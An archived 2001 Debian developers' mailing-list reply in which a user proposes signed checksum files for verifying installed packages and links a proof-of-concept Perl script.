Re: packages without .md5sums file?

To: debian-devel@lists.debian.org
Subject: Re: packages without .md5sums file?
From: Igor Belyi <ibelyi@yahoo.com>
Date: Wed, 8 Aug 2001 12:49:30 -0400
Message-id: <[🔎] 15217.28058.196792.140763@katehok.internal.katehok.homeip.net>
In-reply-to: <[🔎] 15208.9560.301705.573867@katehok.internal.katehok.homeip.net>
References: <[🔎] 15208.9560.301705.573867@katehok.internal.katehok.homeip.net>

Igor Belyi writes:
> What I think is necessary is a signature on md5sums. There's
> a signature in the *.deb files but those are usually gone
> after installation. If there were <package>.md5sign or
> something like that with signature for md5sums this will
> be quite enough to verify files from the package.

Just to follow up on the issue.

I've sketched a Perl script which introduces md5sign files. This file
is a signed text which contains checksums for control files (md5sums,
postinst, prerm, etc.) and some fields from the control file (only
"Maintainer" for now). This way authenticity of all files can be
verified.

Script is just a "proof of concept" thing but it already can sign and
verify installed packages and DEB archives.

Unfortunately, I don't have time to work on it now. If somebody in
Debian community think there's a ground for this idea, I've put the
script, README, and TODO at
ftp://ftp.katehok.homeip.net/pub/debmd5sign.tar.gz

Good luck and thanks for all the fish.
Igor (Debian user)

Reply to:

References:
- Re: packages without .md5sums file?
  - From: Igor Belyi <ibelyi@yahoo.com>

Prev by Date: Bug#108057: ITP: gmrun -- Featureful CLI-like GTK+ application launcher
Next by Date: Re: [Debian account] I request your attention
Previous by thread: Re: packages without .md5sums file?
Next by thread: [Debian account] I request your attention
Index(es):
- Date
- Thread